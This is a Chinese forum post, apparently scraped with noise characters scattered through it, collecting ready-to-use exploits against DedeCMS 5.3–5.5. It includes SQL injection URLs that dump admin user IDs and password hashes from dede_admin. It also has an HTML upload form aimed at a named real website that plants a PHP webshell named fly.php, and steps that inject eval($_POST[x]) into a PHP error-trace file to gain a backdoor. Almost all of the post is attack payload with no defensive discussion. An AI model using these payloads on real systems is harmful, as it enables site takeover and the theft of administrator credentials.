% E1 Q: m7 v. J" O4 N# P  Jhttp://st0p/dedecms51/plus/feedback_js.php?arcurl=' union select "' and 1=2 union select 1,1,1,userid,3,1,3,3,pwd,1,1,3,1,1,1,1,1 from dede_admin where 1=1 union select * from dede_feedback where 1=2 and ''='" from dede_admin where ''='
8 s5 D4 b. k  h/ D6 G) p0 I: E1 J. k9 b5 l, \3 w$ u- _
; B% U0 h1 M$ {' F+ G$ ?$ E

7 R, U7 O% ^% q; Z
- D2 K& M- l% e$ S, C2 L9 f3 f$ M( B, N  {5 q: w& C2 u
* D0 D  W! Q$ k& `$ H7 m
- X1 Y4 _7 ]% ~1 x% T. N, E" o/ |2 o
4 x  g3 V+ P6 @) N2 T4 R# e" S9 s3 b

3 d* p! w  {& S
0 g; Y1 ~1 \  H# {! F织梦(Dedecms)select_soft_post.php页面变量未初始漏洞
$ F+ X; O0 N8 R. i' n<html>6 f) ^) `0 c) D7 {" Z
<head>$ W* C) z0 c! E" e
<title>Dedecms v55 RCE Exploit Codz By flyh4t</title>) m0 `; v! U2 X& K: q/ U
</head>
. P" R0 H  w+ v6 n0 w9 n<body style="FONT-SIZE: 9pt">
" N& V" P2 e: a---------- Dedecms v55 RCE Exploit Codz By flyh4t---------- <br /><br />4 i' W5 m0 O' s; W/ \
<form action=http://www.nuanyue.com/uploads/include/dialog/select_soft_post.php method='POST' enctype="multipart/form-data" name='myform'>
% ]" p/ c2 L  _' N" z' s<input type='hidden' name='activepath' value='/data/cache/' />7 [4 j$ d: q! ?1 H6 I$ [
<input type='hidden' name='cfg_basedir' value='../../' />
+ S5 q) r: E1 m<input type='hidden' name='cfg_imgtype' value='php' />0 K* }: A: E/ W# E; C) i
<input type='hidden' name='cfg_not_allowall' value='txt' />
- X; x2 ]8 E3 v0 r$ r<input type='hidden' name='cfg_softtype' value='php' />
& N  q8 d: p6 C9 f2 y* X2 f<input type='hidden' name='cfg_mediatype' value='php' />2 G9 L$ D- }  p6 v3 a
<input type='hidden' name='f' value='form1.enclosure' />* A6 K4 u: S# g# B
<input type='hidden' name='job' value='upload' />2 u! Y3 Z* W  G) B
<input type='hidden' name='newname' value='fly.php' />8 s5 p; f  A7 O
Select U Shell <input type='file' name='uploadfile' size='25' />
% W2 H$ r1 w" N<input type='submit' name='sb1' value='确定' />
3 L; }, W& U: B8 _$ R1 f! q  c3 Y3 N</form>
( ]% ~, ?! S1 a0 _<br />It's just a exp for the bug of Dedecms V55...<br />! d1 \# I7 C9 K$ U! I! }& ]
Need register_globals = on...<br />
( K2 [9 M) f) H9 c5 `6 _Fun the game,get a webshell at /data/cache/fly.php...<br />( ?5 I& i6 _5 A, {$ J
</body>+ q0 k* A/ z- Y7 ]$ t: P' Z
</html>3 t4 @( W, I6 s4 t, [
& l1 E) _. y! Y* |
5 ^1 Z7 p& U+ g3 |. ]  r# c
" n6 U  t, D" Y9 c- H9 m8 ]
3 v. {. t. w: D- P
' V5 N6 `/ S" E$ U! |0 ]: h, F
2 J% S! }0 L* n4 u3 [) t- }7 g3 q

0 ?7 S3 e. w3 k4 {6 T0 D" L- Q2 b
5 {5 g4 u4 P2 K9 a/ n  C3 K3 S
. E$ d/ T8 J1 k) |* \6 t9 O3 t
( |9 y5 W. l7 q4 ]8 x0 B3 l8 Z' t6 A织梦(dedecms)5.3 – 5.5 plus/digg_frame.php 注入漏洞
4 D+ [% `# O/ \8 w; B+ a7 S利用了MySQL字段数值溢出引发错误和DEDECMS用PHP记录数据库错误信息并且文件头部没有验证的漏洞。; M# k# X4 F: r# m
1. 访问网址:
2 o9 G- M+ {. D( @% r% w! S
http://www.abc.com/plus/digg_fra ... 024%651024&mid=*/eval($_POST[x]);var_dump(3);?>; x9 m! n4 q( y! _% q* O
可看见错误信息
0 d+ i; G+ ~- [- p! y2 T7 B1 }: @7 }2 e' ~) y, H
& g* q* Z* F" h$ F
2. 访问
http://www.abc.com/data/mysql_error_trace.php 看到以下信息证明注入成功了。
4 o! a/ K  ?' l4 p0 {. ?int(3) Error: Illegal double '1024e1024' value found during parsing
) b9 p5 O+ F. q3 O6 j& LError sql: Select goodpost,badpost,scores From `gxeduw_archives` where id=1024e1024 limit 0,1; */ ?>
% C( O& c' ]  F$ \; M* v
6 q) z+ e5 ~+ g9 F
$ k+ I8 Y5 ^! m# p; i: Q3. 执行dede.rar里的文件 test.html,注意 form 中 action 的地址是
$ O7 H3 g" B6 A/ l1 P' r
5 o- l$ b$ z- F
" r: R8 J3 a! t<form action=”
http://www.abc.com/data/mysql_error_trace.php” enctype=”application/x-www-form-urlencoded” method=”post”>
$ k$ A/ }0 t0 v3 _) J9 S8 z8 r4 @, X, I# _
! K  E' l# K  Y+ Z' L
按确定后的看到第2步骤的信息表示文件木马上传成功.8 D  u5 l/ J* x& M4 r( p
: h) K- [% g; u# A% \

5 Q4 a) W' r5 h5 J9 A
2 k' f& o; g" r
& j& a# ?- G; Z  N: l# r6 |, R5 m# l' E; |9 _

( Y1 S* _  q# J3 |  U8 c) {* h# l8 t
4 P2 n: W" s5 M- I4 `5 [" L9 m9 l8 @- a) Q+ K) K5 r

! ]+ e6 B  h, J3 J: o$ o- R( x" Y* _1 }0 O9 `' m0 t# R
! A2 W2 H* v/ G5 D+ H/ v0 n- N

) f0 {% T  P( w2 _9 D1 t8 E7 }* r7 n织梦(DedeCms)plus/infosearch.php 文件注入漏洞
2 c" t1 c' ^: W! J0 _6 a7 Qhttp://localhost/plus/infosearch.php?action=search&q=%cf'%20union%20select%201,2,userid,4,pwd,6%20from%20dede_admin/*
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表